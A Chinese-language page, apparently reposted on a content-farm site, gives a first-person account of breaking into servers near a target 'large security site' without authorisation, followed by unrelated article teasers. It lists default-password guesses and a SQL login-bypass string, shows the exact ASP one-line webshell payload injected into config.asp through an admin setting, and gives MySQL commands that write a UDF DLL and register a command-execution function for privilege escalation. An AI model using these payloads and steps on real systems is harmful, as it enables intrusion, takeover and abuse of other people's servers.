文学起点网
当前位置: 首页 文学百科

网络入侵处置方法(入侵技巧分享网络安全)

时间:2023-07-28 作者: 小编 阅读量: 2 栏目名: 文学百科

可是无论我用抓包修改文件名方式以及1.asp;.jpg方式漏洞都无法成功,并且上传后系统自动重新命名。这套系统共有6个上传页面,只是每个都这样的限制,看起来无法绕过了。这时我想到的时修改网站属性的同时就是把config.asp的内容给改了。这时我再打开config.asp发现内容如下:ConstUpFileType="jpg|gif|png<%execute%>"'允许的上传文件类型看起来写入成功了,然后马上拿客户端连接提交结果失败。

网络入侵处置方法?网络渗透中的一些细节和技巧后面做了一些补充 关于在phpmyadmin里UDF提权的一些细节,今天小编就来聊一聊关于网络入侵处置方法?接下来我们就一起去研究一下吧!

网络入侵处置方法

网络渗透中的一些细节和技巧

后面做了一些补充 关于在phpmyadmin里UDF提权的一些细节

大型站点渗透的思路要么就是旁注,要么就是攻陷C段服务器嗅探。因为独立域名服务器,那么就只有从C段下手了。

用iisputscaner扫描有IIS写权限漏洞的服务器。

发现有一台可以利用,随后拿到webshell,当我费尽千心万苦提权拿到3389后,发现这台服务器跟目标不是一个网段,

中间用iisputscaner扫描开放web服务的机器。

对于80端口渗透我是这样做的:

1、首先在url后面加admin回车,看是否能进入后台管理界面,然后尝试弱口令

admin:admin

admin:admin888

admin:123456

可以尝试'or'='or'等

注入的方式

登录

2、还可以再url后面加login.asp,login.php等去尝试找后台,如果无法登录后台,或者后台地址根本找不到,

那么我们可以尝试去寻找这个网站用的是哪套WEB系统。有的站点页面最下方直接就标准出来了,有的

在后台登录界面有,有的根本无法很直接的判断出是什么系统。这个时候可以找这个网站比较有点特的URL地址,

比如某站点地址有admin/previlege/login.asp; 然后googel搜索,inurl:admin/previlege/login.asp;

这样就能找到不少这样的站点,看看其他站点是否标注了哪套WEB系统。当我们知道了站点的系统后就可以搜索这套系统被公布的漏洞,

0day,exp然后就可以较快的 有目的性的进行渗透。不然就只有慢慢尝试去寻找注入点,或者寻找上传漏洞,比较费时间。

根据以上思想我花了一些时间看了好几个机器终于利用某系统新出的漏洞拿到了shell,

然后PHP shell执行DOS命令竟然直接就可以添加系统账户。然后上传udf.php ,

这个是提权用的,不过我发现他开3389功能不错,给这台机器开了3389。

这个时候心情比较愉悦,因为可以对我的目标机器进行嗅探了。但万万让我很郁闷的事又发生了,

我再次ping那个大型的安全站点时发现它的IP地址完全改变了,完全不是我一开始PING出来的那个地址了。

顿时 心情跌入低谷。这个时候我想要么它是动态IP?真不知道 怎么继续了。于是就暂停去休息。

第二天继续PING目标, 结果目标还是后面这个IP 不管了继续从这个IP的C段入手,再找台机器 还是按上面的思路,最终嗅探目标。

不过后面进行的C段渗透比较艰难了,我机会1-255开放WEB的站点都看了,几乎没有哪个站点可以很快的

拿到SHELL ,于是昨天晚上用XSCAN出来扫一圈,发现如下:

1、有几台FTP弱口令,但没任何权限

2、有台FTP弱口令, 可以上传文件,但不是WEB目录;FTP也没执行命令权限;

3、有台SQL若口令, 同样没任何权限

心中无比凄凉。

这个时候发现了一个服务器一个站点时cms3.0.0但搜索了公布的漏洞 都无法成功利用,同时还有套WEB系统,

放的是某**站点是ASP系统结构。直接点 管理 进入后台登录界面 尝试了几次 最后以admin:123456登入后台。

后台我是翻来覆去的到处看,始终没找到利用的地方。在后台 我的思路如下:

1、尝试找到这是哪套系统。后台,管理界面都无法直接看出。只是在登录界面看源码时看到是**学校管理系统9正式版。

于是搜索该系统可能被公布的漏洞,但一无所获,也许这个系统比较冷僻 关注的人很少。

2、找上传的地方,看是否有上传漏洞。我在文章编辑里找到有上传的类型还挺多 还后HTML型。

可是无论我用抓包 修改文件名方式以及1.asp;.jpg方式漏洞都无法成功,并且上传后系统自动重新命名。看来无法利用上传漏洞。

3、有个数据库备份 只是备份只能以MDB后缀,而且我点备份似乎看起来它并没有备份可能系统有些问题。

4、尝试把该套系统下载下来,在自己机器上看看,会不会有什么可以渗透进去的地方。我还是看的上传页面

看看是否能绕过去格式限制。

程序先判断是否在已有的允许的类型里,如果不是 就直接返回错误;然后再过滤一道,后面这道觉得有点多余。

这套系统共有6个上传页面,只是每个都这样的限制,看起来无法绕过了。

这时发现这个页面顶端 有句 :<!--#include file="Inc/upload.asp"-->

然后就看看upload.asp,结果看到就是一个 无组件上传类 。

只是在INC这个目录下 还有个config.asp就顺便看看

在后台管理界面 网站属性设置里 有这些内容,记得当时

我在上传类型里添加了asp类型,添加成功了但是就是还无法上传。

这时我想到的时 修改网站属性的同时 就是把config.asp 的内容给改了。那么我是不是可以吧一句话木马写进去?

于是就赶紧尝试,直接 在 允许上传类型后面加一句话木马。这时我再打开config.asp发现内容

如下:

Const UpFileType="jpg|gif|png<%execute(request("3"))%>" '允许的上传文件类型

看起来写入成功了,然后马上拿客户端连接 提交 结果 失败。

但想想 会不会是 前后 < >这些符号没关闭好?

尝试修改 config.asp 如下 :

Const UpFileType="jpg|gif|png"%> <%execute(request("3"))%> <% ' " '允许的上传文件类型

把类型后面接一个%>把前面的闭合好,然后 插入一句话木马 然后 加<% 后asp文件最后的%>对应

后面 接 ' 是吧 最后原有的"给注释掉,

于是我先在自己系统搭建环境 进入后台 在类型后面 输入"%> <%execute(request("3"))%> <% ' 如下图

提交,然后 再看看config.asp文件:

尝试连接一句话 shell 在 inc/config.asp

成功得到shell。

得到了后台shell后 发现没什么权限,这时我用wwwscan扫描下 web目录看看有没有什么又用的东西。

发现可以不用密码 直接登录phpmyadmin后台,

一开始在后台翻来翻去找不到什么又用的东西,找到php后台数据库mysql密文密码 也无法解密。

试图用数据库语句 into outfile 写入一句话shell 但又不知道物理路径,尝试了网上公布的所有暴路径的方式 都无法得到

也尝试对一些目录 loadfile 还是没得到

后面想到udf提权就找了找这方面的资料:

《Windows环境下通过MySQL以SYSTEM身份执行系统命令》

《利用mysql上传和执行文件》

《MYSQL中的UDF – Can’t open shared library 的研究》

主要有两点思想:

第一:可以通过MySQL上传二进制文件,例如自己编写的UDF DLL;

第二:可以通过注册UDF DLL中自写的Function而执行任意命令。

自己构造mysql数据库命令如下:

DROP TABLE IF EXISTS mix;

create table mix(data LONGBLOB);

INSERT INTO `mysql`.`mix` (`data`) VALUES(0x45…………..)(二进制数据省略)

SELECT data FROM mix INTO DUMPFILE "c:\\udf.dll";

drop table mix;

成功将 二进制文件udf.dll上传到 服务器c盘目录下。

1、 在phpmyadmin里 如果表名前不带数据库名 会在生成的文件前多出半字节0。

2、 如果通过变量赋值 然后将变量插入表中 那么最后生成的文件里0字节 会变成\0。

最后终于 成功上传了udf.dll,但是在执行

CREATE FUNCTION cmdshell RETURNS STRING SONAME 'C:udf.dll'

时提示无法共享库,重新上传又提示文件已经存在。 我猜想一定时被杀毒软件拦截了。

只留下cmdshell()函数。并且把cmdshell()函数改名 为windcmd()。

然后执行 CREATE FUNCTION windcmd RETURNS STRING SONAME 'C:udf.dll'

接着:

Select windcmd(“net user”)

服务器开了3389,到此拿下了这台服务器权限!

    推荐阅读
  • 苏州旅游攻略景点必去(苏州旅游必去景点有哪些)

    位于苏州市东北街一百七十八号,始建于明朝正德年间。虎丘是AAAAA级景区及全国文明单位,首批十佳文明风景旅游区示范点。中午,周庄最为欢闹,游人穿梭熙熙攘攘,船儿来回摇摇荡荡,各地的游客与热情的商铺融为一体,热闹非凡,安静的古镇着实多了些欢闹的气息。狮子林为苏州四大名园之一,位于苏州市市城东北园林路。

  • 买的玉米种子是瘪的(去年买的玉米种子剩了很多)

    去年买的陈玉米种子建议不要用针对去年的陈玉米种子,大多情况下不建议再次使用,会影响到玉米后期的生长和产量情况。陈年的因为保管的问题,可能会出现很多因素影响玉米的出苗率或者后期的生长。陈玉米种子隔了一年后再种植,种子自身水分含量降低,水分降低严重的情况下,影响播种的效率和玉米的后期生长,由于活性降低,即使能出芽,也不一定能出苗。

  • 173.2亿!国庆消费火爆 国庆消费市场

    今年国庆、重阳两节叠加,全省消费市场呈现平衡较快增长态势,服装、家电、汽车等商品消费亮点突出,大众餐饮、旅行休闲、文体娱乐等主要服务消费备受青睐。根据商务部业务统一平台生存必需品监测系统显示,国庆黄金周期间,全省生存必需品市场供应充沛,价格总体平衡。除了买买买,国庆还是婚庆、团圆、会友高峰,各地亲友聚餐、婚寿宴等大众化餐饮生意兴隆。

  • 吴承恩是怎么写出的西游记(吴承恩怎么写出的西游记)

    吴承恩怎么写出的西游记诸葛长青:吴承恩写西游记诸葛长青:吴承恩怎么写出的《西游记》西游记,广泛流传西游记,作者吴承恩西游记,包含了儒释道大智慧那么,吴承恩是怎么写出的《西游记》呢?诸葛长青把自己对吴承恩写《西游记》,研究成。

  • 李逵扮演者(大家一起来看看吧)

    我们一起去了解并探讨一下这个问题吧!李逵扮演者赵小锐的李逵应该算是很多人印象当中的经典所在了,他的李逵也是很粗犷,但是这种粗犷当中却带着细腻,也是因为这个角色,他开始受到了不少的观众的关注和喜爱。其实之前的他也有出演过一些电视剧的,但是可惜的是一直都没能够真正的红起来,是李逵这个角色,让他一夜成名爆火了。

  • 汽车空间大小怎么看轴距(什么因素会影响车内空间)

    大众速腾,长度4655mm,轴距2651mm。看外观就明白了,因为宝马320i是后驱车,发动机采用纵置布局;而大众速腾是前驱车,发动机采用横置布局。而且由于发动机纵置,后驱设计,对于车内空间侵占较为严重,所以宝马320的长轴距实际上对于空间的帮助是“虚高”的。前面我们就提到了,宝马3系采用了后驱,大众速腾采用了前驱。回到我们的主题,通常来说,麦弗逊与扭力梁对于车辆空间的侵占是最小的,而多连杆和双叉臂对于车辆空间侵占是要更大的。

  • 湖南省医保局2015年工作思路与安排 湖南省医疗保障局领导班子组成人员

    督促指导各统筹地区核实提高缴费基数,强化保险费足额征收。继续加强工伤认定参与,把好工伤入口关。认真核实、积极处理群众举报问题,始终保持高压态势。加强生育医疗服务管理,规范生育津贴发放。二是启动实施工伤保险信息系统改造升级,改进工伤职工异地就医联网结算,方便工伤职工救治。三是加强财务、业务数据清理,提高数据质量;通报全省“三险”基金运行分析,指导市州加强基金运行风险管控。

  • 民国最渣四大渣男(民国著名4大渣男)

    当时很多文人在接受自由恋爱的思想时,家中已经有了父母为之安排的妻子。郁达夫一生有过三位妻子,一位同居情人。郁达夫后来还是和王映霞离婚,1940年在新加坡认识了比他小20岁的播音员李莜英,两人很快就同居了。第二任妻子佐藤富子,是个日本女人,为了和郭沫若在一起,不仅改名为“郭安娜”,还和父母断绝了关系。1937年,郭沫若抛弃妻子回国,和女明星于立群同居,两人于2年后再重庆结婚。

  • 电脑怎么连打印机教程(教会你快速学会电脑如何连接打印机的安装使用方法)

    最近很多网友都在私信给小编,小编也无法一一回复,有些问题也无法简约介绍,所以只能在头条文章内与大家共享。

  • 爱吃鸡蛋的注意了这3种鸡蛋不能买(这些鸡蛋没你想的那么好)

    营养均衡的孩子没必要补这种元素;真正缺乏硒,靠富硒蛋补,根本起不了多大作用。这类蛋再好,也别给孩子吃那就是全生或半熟的蛋,比如溏心蛋。一般溏心蛋的加热时间短,不能完全杀死细菌,生蛋液根本没有处理细菌,对于抵抗力低、易感染的宝宝来说,非常容易被细菌感染。